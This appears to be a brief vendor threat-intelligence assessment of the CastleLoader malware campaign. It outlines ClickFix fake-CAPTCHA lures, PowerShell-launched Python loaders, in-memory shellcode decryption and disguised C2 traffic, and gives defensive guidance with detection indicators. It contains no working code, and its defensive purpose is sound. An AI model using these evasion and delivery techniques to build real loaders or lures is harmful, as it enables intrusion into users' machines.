CastleLoader Malware Uses ClickFix Prompts and Python Loader Chain
CORTEX Protocol Intelligence Assessment
Business Impact: ClickFix social engineering exploits user trust in legitimate CAPTCHA prompts to achieve initial access. Python-based loaders evade traditional antivirus detection. Corporate environments with Python installed for development work are primary targets. In-memory execution bypasses file-based detection. Technical Context: CastleLoader uses ClickFix social engineering (T1204.002 User Execution: Malicious File) to execute PowerShell commands that download Python loader chains (T1059.001, T1059.006). Python bytecode reconstructs CastleLoader shellcode in memory (T1055 Process Injection) using PEB Walking for API resolution (T1106 Native API) and XOR decryption. GoogeBot user agent and GitHub/Pastebin hosting make C2 traffic appear benign. Evolution from AutoIt to Python indicates adaptation to evade detection in dev-heavy environments.
Strategic Intelligence Guidance
- Add ClickFix-style prompts and Run dialog command abuse to user awareness training, emphasizing that staff should never execute instructions from unsolicited pop-ups or emails.
- Harden endpoints by restricting access to cmd.exe, PowerShell and Python interpreters for non-administrative users, and apply application control policies to block interpreters from unapproved paths.
- Tune EDR and SIEM detections for suspicious process chains involving conhost.exe, cmd.exe and pythonw.exe, especially when fetching archives and unpacking them into AppData.
- Monitor DNS and HTTP traffic for CastleLoader-linked indicators such as the GoogeBot user agent and suspicious /service/download/ paths, and block or sandbox traffic to newly registered domains used in the campaign.